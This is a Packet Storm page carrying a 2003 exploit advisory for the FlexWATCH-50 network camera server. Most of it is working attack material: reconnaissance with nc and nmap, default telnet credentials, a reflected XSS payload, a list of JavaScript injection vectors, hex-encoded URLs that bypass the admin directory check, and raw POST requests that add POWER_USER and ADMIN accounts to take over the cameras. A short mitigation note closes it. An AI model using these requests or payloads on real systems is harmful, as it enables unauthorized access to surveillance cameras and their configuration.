exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Security_FlexWATCH-2.txt

Security_FlexWATCH-2.txt
Posted Dec 15, 2003
Authored by Slaizer

The FlexWATCH surveillance camera server (tested FlexWATCH-50 web ver 2.2 Build Nov 18 2003) is used by many banks and "secure" places and contains remotely exploitable vulnerabilities which allow remote attackers to view camera footage, add users, remove users, change the configuration, disable camera surveillance, cross site scripting, and more.

tags | exploit, remote, web, vulnerability, xss
SHA-256 | 4934d0e7b56716500ef80132c3567024e4d6fe3186aa10eb1cec0cc51e6eb833

Security_FlexWATCH-2.txt

Change Mirror Download
#=============================================================
# Unauthorized Access vulnerability in FlexWATCH camera Server
# Second Assault !
#=============================================================


Author: SLAIZER
mail: slaizer[at]phreaker.net

Vendor : SEYEON Technology
System : FlexWATCH Network Video Server
url : http://www.flexwatch.com/
Mail: sytech@seyeon.co.kr

Protuct Version : FlexWATCH-50 Web Ver 2.2 tested Build Nov 18 2003

#====================
# Introduction
#====================

A few months ago I published another document , explaining how to obtain entire access
to the system of easy and fast form.
The same document was sent to SEYEON before being published , since I did not obtain
response of them , I decided to publish it. Two months after having being published ,
SEYEON got in touch with me. They asked me that test a new system already patched to
the bug , in order that I was saying to them that bugs had found .
They demanded me that it should remove the name of the company of my previus document
and thet he should not publish any more...
In addition to realizing a work to the company with many economic benefits of completely
free form , thing that I do not accept . I will always be ready to help to whom I needed
it from free form where as I'm not demanded anything and much less I use propietary
software. I'm sorry that it seems to be exagerate but nobody lives of the air.


#===================
# Description
#===================

·To examining the new system!

slaizer@Necora:~$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80

HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs <---------- :) the same everlasting banner
Date: Mon Dec 1 01:01:26 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 1


·In another version do not examine the services use , becouse I did not need it :P.

root@Necora:~$ nmap -sS -P0 victim
Interesting ports on victim (censured :P):

PORT STATE SERVICE
21/tcp open ftp <-------
23/tcp open telnet <------- Default user/pass are root/root :P
80/tcp open http <------- They are not also very interesting right now ,
1024/tcp open kdm <------- but with the nice thing that is to use ssl :P.
1755/tcp open wms <-------



·It's time to see web application :

·Sailing along the web we think that the system has changed a bit as for the tree of
directories , but for the rest it seems to be equal .

The first thing what we meet is a bug in the application entrusted to notify to us
that url to which we eant to accede doesn't exist ( 404 error ) , a piece of XSS :P .

Cross-Site Scripting .

Example :

mozilla http://victim/hehe.html<H1><script>alert('Security?');</script>

Results :

Access Error: Page not found

when trying to obtain /hehe.html

cannot open URL /hehe.html

( The code is executed perfectly even two times are executed .. hehe . Turning out
be of that time two windows alerting us with the message -Security ? ).

View source :

<html>
<head>
<title>Document Error: Page not found</title>
</head>
<body>
<h2>Access Error: Page not found</h2>
when trying to obtain <b>/hehe.html<h1><script>alert('Security ?');</script></b>
<br><p>Cannot open URL <b>/hehe.html<h1><script>alert('Security ?');</script></b></p>
</body>
</html>

Note:

This type of methods is well-known to gain access to the system by means of links malicious
to do with the identification of some user .
document.write / document.cookie / document.location..


I expose different methods of injection Javascript extracted of Globbes Security Advisory #33:

<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]


·There has always to be verified the information that the client sends to the Servant , in this
case the most obvius serious solution to verify that malicious characters are not inserted
as for example substituing to their html equivalent.




------------ u0xa ---------------



·At the moment where I want to come it's to this url : admin/aindex.htm .
That is where one finds the system-administration , so trying and using
imagination I verify that it happens on having sent the request in hexadecimal format.

Example :



slaizer@Necora:~$ ./urlhex.pl http://victim/admin/aindex.htm

------------ Url encode to hex mode ----------------

http://victim/%61%64m%69n/a%69nde%78.%68t%6D

-----------------By SLAIZER tools ------------------

I obtain this in text plain :


------ code -----
<html>
<head>
<script language="Javascript">
onBlur=self.focus()
</script>
<frameset cols="196,*" framespacing="0" frameborder="0">
<frame src="admin.htm" name="menu_frame" id="menu_frame" scrolling="Auto" marginwidth="0" marginheight="0">
<frame src="videocfg.htm" name="main_frame" id="tool_frame" scrolling="Auto" marginwidth="10" marginheight="0">
</frameset>
</head>
</html>
----- code -----



:D It's my friend the frame of configuracion and it's in plain text ..
We go for good way we are going to look if we can do something with this.


slaizer@Necora:~$ ./urlhex.pl http://victim/admin/admin.htm

------------ Url encode to hex mode ----------------

http://victim/adm%69%6E/%61%64%6D%69n.%68tm

-----------------By SLAIZER tools ------------------


Here it is where we go away to centre , so we are going to see it!.

Important links :
_______________________
|-Change Root | <---- /asp/pwdcfg.asp
|Password configuration |
| |
|-Add User | <---- /asp/adduser.asp /* Let's go! */
| |
|-Delete User | <---- /asp/deluser.asp
| |
|-Access Level | <---- /asp/chglimit.asp
|_______________________|



slaizer@Necora:~$ nc victim 80

POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123
&passconf=root123&group=POWER_USER&enabled=on&ok=OK


----------- u0xa ------------

<br>User, "slaizer" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>


----------- u0xa ------------



It seems that there is post correctly , but on having tried login shows us this error directly :

Access Error: Forbidden

When trying to obtain /admin/aindex.htm
Access Denied Prohibited User .

-------------------------------


foh....but ... I login in :

http://victim/app/idxas.html <----- Camera Administration.

Login : slaizer
password: root123


|o_O| <-hehe !! We already have access to all Cameras!!! using the login slaizer with pass root123
that we add in the previous setp. We have already given a great steo improve..


But...The solution is simpler than seems.. the added user belongs to POWER_USER , earlier
having this user really more sufficient , but it is enought to us to done one more test but
add another user to the group of ADMIN :

Example

slaizer@Necora:~$ nc victim 80

POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 147
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=rezials&password=123root
&passconf=123root&group=ADMIN&enabled=on&ok=OK




----------- u0xa ------------

<br>User, "rezials" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>


----------- u0xa ------------

At the moment ok! .


I use login rezials & password 123root and..... :D Congratulations! you Are ADMIN!!!

You can already do what you want in the system!!!

The problem was becouse the directory /admin was already not allowin him access to the users as previously
it was happening.


#=========================
# Solution :
#=========================


Always verify the type of request that the client realizes, since you can see I have used a miscellany of
code hexadeciaml and ascii .
The best solution is to create meetings of identification and to allow the access to such directories for
the meeting.

/* Note : login in www.flexwatch.com as technic e-mail suport... xD */


#========================
# GreetSssSss!!!
#========================

- gyorgyo - Makensi - palako - overpower - zapper - sha0 - IaM - phiber - kanutron - TaYoKeN - plAnadeCu -

- kicat - AbeToRiuS - M0RGAN - ZeroQ ...........! xD
[[Irc-Hispano : #boinasnegras , #ngsec]]

Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close